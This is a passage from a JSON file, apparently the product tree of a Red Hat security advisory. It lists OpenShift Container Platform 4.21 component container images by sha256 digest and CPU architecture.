"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
